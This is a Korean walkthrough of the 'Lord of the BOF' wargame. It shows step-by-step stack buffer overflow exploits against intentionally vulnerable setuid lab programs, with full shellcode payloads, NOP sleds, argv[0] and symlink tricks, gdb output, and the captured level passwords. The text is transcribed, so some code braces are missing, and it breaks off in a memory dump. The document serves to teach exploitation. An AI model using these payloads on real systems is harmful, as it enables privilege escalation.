The Lord of the BOF -The Fellowship of the BOF 풀이보고서 by phpmyadmin -Contents- 0x00 프롤로그
|
|
- 광식 반
- 5 years ago
- Views:
Transcription
1 The Lord of the BOF -The Fellowship of the BOF 풀이보고서 by phpmyadmin -Contents- 0x00 프롤로그 x01 gate x02 gremlin x03 cobolt x04 goblin x05 orc x06 wolfman x07 darkelf x08 orge x09 troll x0a vampire x0b skeleton x0c golem x0d darkknight x0e bugbear x0f giant x10 assassin x11 zombie_assassin x12 succubus x13 nightmare x14 xavius x15 에필로그
2 0x00 프롤로그 드디어 RedHat 원정대를마치고 Fedora성에진입할수있게되었습니다. 여름에시작한원정은약 8개월만에끝을보게되었네요. 프롤로그에선간단한팁과간략한문제소개를하겠습니다.. - TIP! [gate@localhost gate]$ chsh Changing shell for gate. Password: New shell [/bin/bash]: /bin/bash2 Shell changed. chsh는로그인한계정의기본쉘을변경하는명령어입니다. login: gate Password: Last login: Sun Jan 8 06:12:07 from [gate@localhost gate]$ ps PID TTY TIME CMD 4531 pts/0 00:00:00 bash pts/0 00:00:00 ps 다음로그인시에이와같이바로 bash2로진입하게됩니다. -소개 Contents를보시면알겠지만이게임은원정을하면서몬스터를잡아나가는게임입니다. 레벨이올라갈수록몬스터는강해지며많은지식을필요로합니다. 악명높은 (?) 몬스터들의주요특징을보겠습니다. ex1)egg hunter : 환경변수이용이불가능해집니다. 에그쉘과같은장비를착용한원정대원은여기가고비. 이후에도 hunter 계열의특징을가진몬스터가등장합니다. ex2)stack destroyer : 스택영역을깨부수는능력입니다. mental 조심하세요. ex3)dangerous waterfall : 리턴주소를덮어씁니다. 여러분에게 ret의소중함을일깨워드립니다. 0x01 gate Xshell을이용하여원정대서버에접속하였습니다. Xshell 4 (Build 0096) Copyright (c) NetSarang Computer, Inc. All rights reserved. Type `help' to learn how to use Xshell prompt. Xshell:\> telnet vmware 에서 /sbin/ifconfig 로확인한 ip 입니다. Connecting to :23... Connection established. Escape character is '^@]' `\ /:
3 < > / \ / The Load of the BOF : The Feelowship of the BOF, 2010 [enter to the dungeon] gate : gate [RULE] - do not use local root exploit - do not use LD_PRELOAD to my-pass - do not use single boot [h4ck3rsch001] _ `\ /`--_ [ ] / \===/ BOF원정대의메인화면입니다. 룰을확인하세요. 기본계정은 gate/gate입니다. login: gate Password: Last login: Sat Oct 22 21:57:14 from 소스를보겠습니다. [gate@localhost gate]$ cat gremlin.c #include<stdio.h> int main(int argc, char *argv[]) char buffer[256]; if(argc < 2) printf("argv error\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); strcpy함수에의해 argv[1] 에입력한값을 256byte짜리버퍼에널을만날때까지복사합니다. -argc, argv 예시./gremlin <input1> <input2>... argv[0] argv[1] argv[2]... argc=3./gremlin <input1> argv[0] argv[1] argc=2./gremlin argv[0] - 3 -
4 argc=1 gate]$ bash2 특수문자 (ex ; 0xff) 의원활한처리를위해 bash2쉘사용. [gate@localhost gate]$ cd tmp 미리만들어둔 tmp 디렉토리에접근 [gate@localhost tmp]$ vi gremlin.c 소스복사후 buffer의주소를출력하는부분을추가하였습니다.[ printf( %#x\n,buffer); ] [gate@localhost tmp]$ gcc -o gremlin gremlin.c 컴파일하고 [gate@localhost tmp]$ gcc v gcc의버전을확인합니다. 2.96이상부터는더미가존재하므로여기선더미가없습니다. Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs /specs gcc version egcs /Linux (egcs release) [gate@localhost tmp]$./gremlin $(python -c 'print "\x90"*260')???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 0xbffffb4f Segmentation fault (core dumped) 버퍼주소출력후세그폴이발생했습니다. 따라서구조는 [buffer 256]+[sfp 4]+[ret( 리턴주소 ) 4] 입니다. [gate@localhost tmp]$./gremlin $(python -c 'print "\x90"*100+"shellcode 24 byte"+"\x90"*136+"ret"') -페이로드구성 [nop 100]+[shellcode 24]+[shellcode 136]+[ret 4]????????????????????????????????????????????????????????????????????????????????????????????????????shellcode 0xbffffb53 [gate@localhost tmp]$./gremlin $(python c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*136+"\x53\xfb\xff\xbf"')????????????????????????????????????????????????????????????????????????????????????????????????????1픐h//shh/bin??s?? 것????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????S? 0xbffffb4b bash$ id uid=500(gate) gid=500(gate) groups=500(gate) bash$ exit exit tmp에만들어둔사본에서공격이성공하였습니다. [gate@localhost tmp]$ cd.. 이제원본에공격을시도하겠습니다. [gate@localhost gate]$./gremlin $(python c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*136+"\x53\xfb\xff\xbf"')????????????????????????????????????????????????????????????????????????????????????????????????????1픐h//shh/bin??s?? - 4 -
5 것????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????S? bash$ whoami gremlin bash$ id uid=500(gate) gid=500(gate) euid=501(gremlin) egid=501(gremlin) groups=500(gate) bash$ my-pass euid = 501 hello bof world 0x02 gremlin 마찬가지로접속후소스를보겠습니다. Last login: Sat Oct 22 22:12:36 from [gremlin@localhost gremlin]$ cat cobolt.c int main(int argc, char *argv[]) char buffer[16]; if(argc < 2) printf("argv error\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); 버퍼가작아진것빼곤별다를게없어보입니다. 그러므로구조는 [buffer 16]+[sfp 4]+[ret 4] 입니다. strcpy함수는 null을만나기전까진 argv[1] 의내용을 buffer에복사합니다. [gremlin@localhost gremlin]$ bash2 [gremlin@localhost gremlin]$ vi coboll.c [gremlin@localhost gremlin]$ gcc -o coboll coboll.c buffer의 ret 뒷부분을출력해주는부분을추가하여사본파일을만듭니다.[ printf( %#x\n,&buffer[25]); ] -페이로드구성 [nop 20]+[ret 4]+[nop 10]+[shellcode 24] [gremlin@localhost gremlin]$./coboll $(python -c 'print "\x90"*20+"\x3c\xfa\xff\xbf"+"\x90"*10+"\x31\xc0 \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')????????????????????<? 퓧?????????1픐h//shh/bin??S?? 것 0xbffffa41 Illegal instruction (core dumped) ret부분엔임의로아무거나 4byte 넣어서실행해보고밑에주소가뜨면해당주소로넣어줍니다. [gremlin@localhost gremlin]$./coboll $(python -c 'print "\x90"*20+"\x41\xfa\xff\xbf"+"\x90"*10+"\x31\xc0 \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')????????????????????a? 퓧?????????1픐h//shh/bin??S?? 것 0xbffffa41 bash$ exit exit - 5 -
6 성공했습니다. 이제원본에시도해봅니다. gremlin]$./cobolt $(python -c 'print "\x90"*20+"\x41\xfa\xff\xbf"+"\x90"*10+"\x31\xc0 \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')????????????????????a? 퓧?????????1픐h//shh/bin??S?? 것 bash$ whoami cobolt bash$ id uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin) bash$ my-pass euid = 502 hacking exposed bash$ exit exit 0x03 cobolt login: cobolt Password: Last login: Sat Oct 22 15:24:37 from [cobolt@localhost cobolt]$ cat goblin.c int main() char buffer[16]; gets(buffer); printf("%s\n", buffer); cobolt는 strcpy가 gets로바뀌었습니다. gets 역시널바이트를만나기전까지입력한값을 buffer에넣으므로 BOF에좋습니다. [cobolt@localhost cobolt]$ ls goblin goblin.c [cobolt@localhost cobolt]$ mkdir tmp [cobolt@localhost cobolt]$ cd tmp [cobolt@localhost tmp]$ vi goblin.c [cobolt@localhost tmp]$ gcc -o goblin goblin.c /tmp/ccolwvw9.o: In function `main': /tmp/ccolwvw9.o(.text+0xb): the `gets' function is dangerous and should not be used. 사본을만든후컴파일해주니 gcc 컴파일러가친절하게 gets함수는 BOF에좋다고설명해줍니다. 이번에도소스끝에 printf( %#x\n,&buffer[50]); 과같은내용을추가하였습니다. [cobolt@localhost tmp]$ (python -c 'print "\x90"*20';cat)./goblin -페이로드 [nop 20]+[ret 4]+[nop 100]+[shellcode 24] 저번과동일하게 [buffer 16]+[sfp 4]+[ret 4] 구조이므로페이로드형태도거의같습니다. 다만여기선 nop에리턴될확률을높이고자뒤의 nop의수를 10배로올렸습니다. 또한 (python문;cat)./goblin을해준다면 () 는여러개의명령문을그룹화하여하나의명령문으로서브쉘에서실행하며서로동등한자식프로세스로연결되면서 cat의입력받은라인이파이프를통해 sh로전달됩니다. 따라서쉘코드를실행하자마자바로끝나지않고 cat 표준입력으로부터입력을기다리게되는데입력받은라인을다시표준출력을하 - 6 -
7 게되므로권한을획득한상태에서도계속해서명령을수행할수있습니다. tmp]$ cat sh pstree init-+-atd -crond -death_knight---death_knight -gpm -httpd---8*[httpd] -identd---identd---3*[identd] -inetd---in.telnetd---login---bash2-+-cat `-sh---pstree...???????????????????? 0xbffffb51 tmp]$ (python -c 'print "\x90"*20+"\x51\xfb\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x 2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)./goblin????????????????????Q? 퓧???????????????????????????????????????????????????????????????????????????????????????????????????1픐h//shh/bin??S?? 0xbffffb51 whoami cobolt exit 것 tmp]$ cd.. cobolt]$ (python -c 'print "\x90"*20+"\x51\xfb\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f \x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)./goblin????????????????????q? 퓧???????????????????????????????????????????????????????????????????????????????????????????????????1픐h//shh/bin??S?? 것 whoami goblin id uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt) my-pass euid = 503 hackers proof pstree( 일부생략 ) bash2-+-bash2---cat `-sh---pstree exit - 7 -
8 cobolt]$ 0x04 goblin goblin]$ cat orc.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) char buffer[40]; int i; if(argc < 2) printf("argv error\n"); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); environ은프로그램실행환경값을가지고있는광역변수로, 여기선 environment( 환경변수 ) 를전부 0을넣어버립니다. 또한 argv[1][47] 부분이 0xbf인지확인하네요. buffer은 40byte이므로 [buffer 40]+[sfp 4]+[ret 4] 입니다. [goblin@localhost goblin]$ bash2 [goblin@localhost goblin]$ ls orc orc.c [goblin@localhost goblin]$ mkdir tmp [goblin@localhost goblin]$ cd tmp [goblin@localhost tmp]$ vi orc.c [goblin@localhost tmp]$ gcc -o orc orc.c [goblin@localhost tmp]$./orc $(python -c 'print "\x90"*47+"\xbf"')??????????????????????????????????????????????? 0xbffffac0 Segmentation fault (core dumped) buffer 주소를출력하는사본생성후조건에맞게넣어줘서 buffer의주소를확인합니다. -페이로드 - 8 -
9 [shellcode 24]+[nop 20]+[ret 4] tmp]$./orc $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\xc0\xfa\xff\xbf"') 1픐h//shh/bin??S?? 것???????????????????? 저 0xbffffac0 bash$ id uid=503(goblin) gid=503(goblin) groups=503(goblin) bash$ exit exit tmp]$ cd.. goblin]$./orc $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6 e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\xc0\xfa\xff\xbf"') 1픐h//shh/bin??S?? 것???????????????????? 저 Illegal instruction 쉘코드중간에점프했을경우이와같이잘못된명령어란메시지가뜹니다. 아마리턴주소가변경된걸겁니다. goblin]$ cd tmp tmp]$./orc $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\xc0\xfa\xff\xbf"') 1픐h//shh/bin??S?? 것???????????????????? 저 0xbffffaa0 Illegal instruction (core dumped) 예상대로사본에서도리턴주소가바뀌어있습니다. 변덕스런시스템이다시리턴주소를바꾸기전에어서시도해봐야겠습니다. tmp]$./orc $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\xa0\xfa\xff\xbf"') 1픐h//shh/bin??S?? 것?????????????????????? 0xbffffaa0 bash$ id uid=503(goblin) gid=503(goblin) groups=503(goblin) bash$ exit exit tmp]$ cd.. goblin]$./orc $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6 e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\xa0\xfa\xff\xbf"') 1픐h//shh/bin??S?? 것?????????????????????? bash$ whoami orc bash$ id uid=503(goblin) gid=503(goblin) euid=504(orc) egid=504(orc) groups=503(goblin) bash$ my-pass euid =
10 cantata bash$ exit 0x05 orc orc]$ cat wolfman.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) char buffer[40]; int i; if(argc < 2) printf("argv error\n"); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); buffer hunter가추가된점을제외하면이전과동일합니다. buffer앞부분은사용할수없으므로 gremlin과동일하게 ret뒤쪽에쉘코드를집어넣어풀어보겠습니다. orc]$ bash2 -페이로드 [nop 44]+[ret 4]+[nop 150]+[shellcode 24] 이번에도성공률을높이기위해다량의 nop를넣어주었습니다. orc]$ mkdir tmp orc]$ ls -l total 24 drwxrwxr-x 2 orc orc 4096 Mar 31 23:46 tmp -rwsr-sr-x 1 wolfman wolfman Feb wolfman
11 -rw-r--r-- 1 root root 581 Mar wolfman.c [orc@localhost orc]$ cd tmp [orc@localhost tmp]$ vi wolfman.c [orc@localhost tmp]$ gcc -o wolfman wolfman.c [orc@localhost tmp]$./wolfman $(python -c 'print "\x90"*44+"\xc0\xfe\xff\xbf"+"\x90"*150+"\x31\xc0\x50\x 68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') &buffer[50] 출력하는부분을추가한사본에공격을시도합니다. 젊? 1?h//shh/bin?S? 것 0xbffffa42 Segmentation fault (core dumped) 임의의 ret주소로시도후출력된주소를가지고재시도해봅니다. [orc@localhost tmp]$./wolfman $(python -c 'print "\x90"*44+"\x42\xfa\xff\xbf"+"\x90"*150+"\x31\xc0\x50\x 68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') B?? 1?h//shh/bin?S? 것 0xbffffa42 bash$ id uid=504(orc) gid=504(orc) groups=504(orc) bash$ exit exit [orc@localhost tmp]$ cd.. 다시원본에시도해보겠습니다. [orc@localhost orc]$./wolfman $(python -c 'print "\x90"*44+"\x42\xfa\xff\xbf"+"\x90"*150+"\x31fman $(pyt hon -c 'print "\x90"*44+"\x42\xfa\xff\xbf"+"\x90"*150+"\x31\xc0\x50\x68\x2f\x2f\x73\x B?? 1?h//shh/bin?S? 것 bash$ whoami wolfman bash$ id uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc) bash$ my-pass euid = 505 love eyuna bash$ exit exit _03_
12 0x06 wolfman wolfman]$ bash2 wolfman]$ cat darkelf.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) char buffer[40]; int i; if(argc < 2) printf("argv error\n"); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n"); // check the length of argument if(strlen(argv[1]) > 48) printf("argument is too long!\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); argument 길이가 48이넘지않아야합니다. 나머지는이전과동일합니다. 따라서버퍼로복사되는문자열은 48을넘기지못하므로 argv[] 인자배열을활용해봅시다. tmp]$ bash2 tmp]$ mkdir tmp tmp]$ cd tmp
13 tmp]$ vi darkelf.c tmp]$ gcc o darkelf darkelf.c printf( %#x,argv[1]); 가추가된사본을만든후컴파일하였습니다. -페이로드 [nop 20]+[shellcode 24]+[ret 4] [wolfman@localhost tmp]$./darkelf $(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x 2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"') 1?h//shh/bin?S? 것ꠖ? 0xbffffc17 나온주소대로넣어보면.. [wolfman@localhost tmp]$./darkelf $(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x 2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x17\xfc\xff\xbf"') 1?h//shh/bin?S? 것ꠖ? 0xbffffc17 bash$ id uid=505(wolfman) gid=505(wolfman) groups=505(wolfman) bash$ exit exit 반가운쉘이나옵니다. [wolfman@localhost tmp]$ cd.. 원본에그대로시도해보겠습니다. [wolfman@localhost wolfman]$./darkelf $(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x 68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x17\xfc\xff\xbf"') 1?h//shh/bin?S? 것ꠖ? bash$ whoami darkelf bash$ id uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman) bash$ my-pass euid = 506 kernel crashed bash$ exit exit 0x07 darkelf [darkelf@localhost darkelf]$ bash2 [darkelf@localhost darkelf]$ cat orge.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[])
14 char buffer[40]; int i; if(argc < 2) printf("argv error\n"); // here is changed! if(strlen(argv[0])!= 77) printf("argv[0] error\n"); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n"); // check the length of argument if(strlen(argv[1]) > 48) printf("argument is too long!\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); // shellcode hunter memset(buffer, 0, 40); 친절하게바뀐부분을주석에서설명해주고있습니다. argv[0] 의길이가 77인지확인합니다. darkelf]$ mkdir tmp darkelf]$ cd tmp tmp]$ cat > test.c main(int argc, char *argv[]) printf("%s\n%d\n",argv[0],strlen(argv[0])); [1]+ Stopped cat >test.c
15 tmp]$ gcc -o test test.c 이해를돕기위해간단한예제를작성하였습니다. tmp]$./test./test 6 [darkelf@localhost tmp]$ /home/darkelf/tmp/test /home/darkelf/tmp/test 22 하위경로를만들어서이름을 77자로맞춰주는방법도있지만이런방법을쓸수도있습니다. [darkelf@localhost tmp]$././././././././././././././././././././././././././././././././././././test././././././././././././././././././././././././././././././././././././test 76. 은현재경로를의미하며.. 은상위경로를의미함을이용합니다. 하나가모자라니앞에홀수경로를추가해주겠습니다. [darkelf@localhost tmp]$../tmp/$(python -c 'print "./"*33')test../tmp/./././././././././././././././././././././././././././././././././test 77 하다보니알게되었는데 / 이많이와도상관없네요. [darkelf@localhost tmp]$ $(python -c 'print "\x2e"+"\x2f"*72+"\x74\x65\x73\x74"').////////////////////////////////////////////////////////////////////////test 77 77로맞춰봤습니다. 심볼릭링크또는하드링크로도맞출수있습니다. [darkelf@localhost tmp]$ ln -s test $(python -c 'print "\x41"*75') [darkelf@localhost tmp]$./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa AAAAAAAAAAAAAAAAAAA./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A 77 [darkelf@localhost tmp]$ vi orge.c [darkelf@localhost tmp]$ gcc -o orge orge.c 저번과마찬가지로 argv[1] 을출력하게하는사본을만들고컴파일하였습니다. -페이로드 [.]+[/ 72]+[orge]+[ (0x20= 공백 )]+[shellcode 24]+[nop 20]+[ret 4] [darkelf@localhost tmp]$ $(python -c 'print "\x2e"+"\x2f"*72+"orge\x20"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68 \x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\xff\xff\xff\xbf"') 1?h//shh/bin?S? 것 0xbffffb8f Segmentation fault (core dumped) [darkelf@localhost tmp]$ $(python -c 'print "\x2e"+"\x2f"*72+"orge\x20"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68 \x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\x8f\xfb\xff\xbf"') 1?h//shh/bin?S? 것? 0xbffffb8f bash$ id
16 uid=506(darkelf) gid=506(darkelf) groups=506(darkelf) bash$ exit exit 사본에서쉘이떴으니원본에동일하게시도하겠습니다. tmp]$ cd.. darkelf]$ $(python -c 'print "\x2e"+"\x2f"*72+"orge\x20"+"\x31\xc0\x50\x68\x2f\x2f\x73 \x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*20+"\x8f\xfb\xff\xbf"') 1?h//shh/bin?S? 것? bash$ whoami orge bash$ id uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf) bash$ my-pass euid = 507 timewalker bash$ exit exit 0x08 orge [orge@localhost orge]$ bash2 [orge@localhost orge]$ cat troll.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) char buffer[40]; int i; // here is changed if(argc!= 2) printf("argc must be two!\n"); // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n");
17 // check the length of argument if(strlen(argv[1]) > 48) printf("argument is too long!\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer hunter memset(buffer, 0, 40); // one more! memset(argv[1], 0, strlen(argv[1])); argv[1] 마저사냥당합니다. 게다가인자개수도 2개로제한되었으므로 argv[2~] 도사용할수없습니다. 그러므로남아있는 argv[0] 을사용해봅시다. orge]$ mkdir tmp orge]$ cd tmp tmp]$ vi troll.c tmp]$ gcc -o troll troll.c printf( %#x\n,&argv[0][15]); 를추가한적절한사본을만듭니다. tmp]$./troll $(python -c 'print "\x90"*47+"\xbf"')??????????????????????????????????????????????? 0xbffffc3a argv[0][15] 의주소를구했습니다. 실행하면대략이런모습입니다. argv[0]=./troll argv[1]=(nop*47+\xbf가들어갔지만결국전부 0x00) tmp]$ mkdir --help Usage: mkdir [OPTION] DIRECTORY... Create the DIRECTORY(ies), if they do not already exist. -m, --mode=mode set permission mode (as in chmod), not rwxrwxrwx - umask -p, --parents no error if existing, make parent directories as needed --verbose print a message for each created directory --help display this help and exit --version output version information and exit 이제 argv[0] 에쉘코드를넣기위해 mkdir p 옵션을줘서 nop와쉘코드로된디렉터리를만듭니다. Report bugs to <bug-fileutils@gnu.org>. [orge@localhost tmp]$ mkdir -p $(python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') (\x2f가디렉터리 (/) 를이기때문에그냥만들어주면에러납니다.) 이제아까구한 argv[0][15] 의주소로원본에시도해줍니다. -페이로드
18 [./tmp/]+[nop 100]+[shellcode 24]+[/../../../../troll]+[ ( 공백 )]+[nop 44]+[ret 4] 원본파일기준으로 tmp경로에 [\x90*100][\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68] 로된폴더안에 \x73\x68\x68 (shh) 폴더안에 [\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80] 폴더가있으므로상위경로의상위경로의상위경로의상위경로는 /home/orge 가됩니다. 따라서 /../../../../troll 이되는겁니다. [orge@localhost orge]$ $(python -c 'print "./tmp/"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"/../../../../troll"') $(python -c 'print "\x90"* 44+"\x3a\xfc\xff\xbf"') :? Segmentation fault 세그폴이뜬걸로보아주소가바뀌었나봅니다. [orge@localhost orge]$ $(python -c 'print "./tmp/"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"/../../../troll"') $(python -c 'print "\x90"*44 +"\x3a\xfc\xff\xbf"') ¾ 0xbffffa20 역시다른주소가나왔습니다. Segmentation fault (core dumped) [orge@localhost orge]$ $(python -c 'print "./tmp/"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"/../../../../troll"') $(python -c 'print "\x90"* 44+"\x20\xfa\xff\xbf"') argc must be two! 인자수가안맞는다는군요. 0x20이원인입니다. 0x20은공백을의미하며, 0x00 취급해버리기때문에스크립트양쪽에 (double quotation) 을붙여줘야합니다. [orge@localhost orge]$ $(python -c 'print "./tmp/"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f \x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"/../../../../troll"') "$(python -c 'print "\x90" *44+"\x20\xfa\xff\xbf"')"? bash$ whoami troll bash$ id uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge) bash$ my-pass euid = 508 aspirin bash$ exit exit 이방법외에도심볼릭링크 (or 하드링크 ) 를통한방법으로도풀수있습니다. ( 링크전에 mkdir p 작업필요 ) [orge@localhost orge]$ ln -s /home/orge/troll $(python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x7 3\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') [orge@localhost orge]$ tmp/troll $(python -c 'print "\x90"*47+"\xbf"')??????????????????????????????????????????????? 0xbffffb14 Segmentation fault (core dumped) [orge@localhost orge]$./$(python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x6 9\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') $(python -c 'print "\x90"*44+"\x14\xfb\xff\xbf"')?????????????????????????????????????????????
19 bash$ 0x09 troll troll]$ cat vampire.c #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) char buffer[40]; if(argc < 2) printf("argv error\n"); if(argv[1][47]!= '\xbf') printf("stack is still your friend.\n"); // here is changed! if(argv[1][46] == '\xff') printf("but it's not forever\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); 에그헌터등길이제한이사라졌지만끝의주소가 argv[1][46] 이 0xff가되면안됩니다. troll]$ bash2 troll]$ cp vampire vimpire troll]$ ls -l v*mpire -rwsr-sr-x 1 vampire vampire Mar vampire -rwsr-sr-x 1 troll troll Apr 1 03:39 vimpire vimpire는 troll이소유하고있는파일이기때문에세그폴이나면자동으로코어덤프가생깁니다. [troll@localhost troll]$./vimpire $(python -c 'print "\x90"*44+"\x56\x34\x12\xbf"+"\x90"* "\x31\xc0 \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x20"') ====== 중 = 간 = 생 = 략 ======
20 1?h//shh/bin?S? 것 Segmentation fault (core dumped) troll]$ gdb -q vimpire core Core was generated by ` '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. (gdb) x/140wx $esp esp를기준으로보기시작하겠습니다. 0xbffe7430: 0x x x x xbffe7440: 0x x x x xbffe7450: 0x x x x xbffe7460: 0x x x x xbffe7470: 0x x x x xbffe7480: 0x x x x xbffe7490: 0x x x x xbffe74a0: 0x x x x xbffe74b0: 0x x x x xbffe74c0: 0x x x x xbffe74d0: 0x x x x xbffe74e0: 0x x x x xbffe74f0: 0x x x x xbffe7500: 0x x x x xbffe7510: 0x x x x xbffe7520: 0x x x x xbffe7530: 0x x x x xbffe7540: 0x x x x xbffe7550: 0x x x x xbffe7560: 0x x x x xbffe7570: 0x x x x xbffe7580: 0x x x x xbffe7590: 0x x x x xbffe75a0: 0x x x x xbffe75b0: 0x x x x xbffe75c0: 0x x x x 